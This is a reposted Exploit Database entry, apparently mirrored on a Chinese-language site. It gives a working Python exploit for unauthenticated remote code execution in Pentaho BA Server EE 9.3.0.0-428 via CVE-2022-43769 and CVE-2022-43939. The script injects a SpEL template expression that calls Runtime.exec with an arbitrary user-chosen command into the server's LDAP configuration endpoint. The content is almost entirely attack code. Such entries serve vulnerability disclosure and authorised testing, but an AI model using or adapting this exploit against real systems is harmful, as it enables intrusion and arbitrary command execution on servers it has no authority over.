Pentaho BA Server EE 9.3.0.0-428 – Remote Code Execution (RCE) (Unauthenticated)

• Exploit Database
• 59 阅读

• 作者： dwbzn
  日期： 2023-04-08
• 类别：

  • webapps
  平台：

  • jsp
• 来源：https://www.exploit-db.com/exploits/51350/

• # Exploit Title: Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)
  # Author: dwbzn
  # Date: 2022-04-04
  # Vendor: https://www.hitachivantara.com/
  # Software Link: https://www.hitachivantara.com/en-us/products/lumada-dataops/data-integration-analytics/download-pentaho.html
  # Version: Pentaho BA Server 9.3.0.0-428
  # CVE: CVE-2022-43769, CVE-2022-43939
  # Tested on: Windows 11
  # Credits: https://research.aurainfosec.io/pentest/pentah0wnage
  # NOTE: This only works on the enterprise edition. Haven't tested it on Linux, but it should work (don't use notepad.exe).
  
  # Unauthenticated RCE via SSTI using CVE-2022-43769 and CVE-2022-43939 (https://research.aurainfosec.io/pentest/pentah0wnage)
  import requests
  import argparse
  
  parser = argparse.ArgumentParser(description='CVE-2022-43769 + CVE-2022-43939 - Unauthenticated RCE via SSTI')
  parser.add_argument('baseurl', type=str, help='base url e.g. http://127.0.0.1:8080/pentaho')
  parser.add_argument('--cmd', type=str, default='notepad.exe', nargs='?', help='command to execute (default notepad.exe)', required=False)
  args = parser.parse_args()
  
  url = f"{args.baseurl}/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{{T(java.lang.Runtime).getRuntime().exec('{args.cmd}')}}&mgrDn=a&pwd=a"
  
  print ("running...")
  r = requests.get(url)
  if r.text == 'false':
  print ("command should've executed! nice.")
  else:
  print ("didn't work. sadge...")